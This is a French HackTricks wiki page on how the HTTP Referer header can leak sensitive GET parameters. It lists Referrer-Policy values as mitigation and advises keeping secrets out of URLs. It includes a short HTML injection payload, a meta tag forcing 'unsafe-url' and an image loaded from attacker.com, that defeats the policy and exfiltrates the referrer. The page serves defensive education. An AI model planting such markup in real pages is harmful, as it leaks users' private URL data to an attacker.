hacktricks/todo/interesting-http.md

3.7 KiB

{% hint style="success" %} Apprenez et pratiquez le piratage AWS : Formation HackTricks AWS Red Team Expert (ARTE)
Apprenez et pratiquez le piratage GCP : Formation HackTricks GCP Red Team Expert (GRTE)

Soutenez HackTricks
{% endhint %}

En-têtes de référence et politique

Le referrer est l'en-tête utilisé par les navigateurs pour indiquer quelle était la page précédemment visitée.

Fuite d'informations sensibles

Si à un moment donné à l'intérieur d'une page web des informations sensibles sont situées dans les paramètres d'une requête GET, si la page contient des liens vers des sources externes ou si un attaquant est capable de faire/suggérer (ingénierie sociale) à l'utilisateur de visiter une URL contrôlée par l'attaquant. Il pourrait être en mesure d'exfiltrer les informations sensibles à l'intérieur de la dernière requête GET.

Atténuation

Vous pouvez faire en sorte que le navigateur suive une politique de referrer qui pourrait éviter l'envoi des informations sensibles vers d'autres applications web :

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Contre-mesure

Vous pouvez outrepasser cette règle en utilisant une balise meta HTML (l'attaquant doit exploiter une injection HTML) :

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Défense

Ne jamais mettre de données sensibles dans les paramètres GET ou les chemins de l'URL.

{% hint style="success" %} Apprenez et pratiquez le piratage AWS :Formation HackTricks AWS Red Team Expert (ARTE)
Apprenez et pratiquez le piratage GCP : Formation HackTricks GCP Red Team Expert (GRTE)

Soutenez HackTricks
{% endhint %}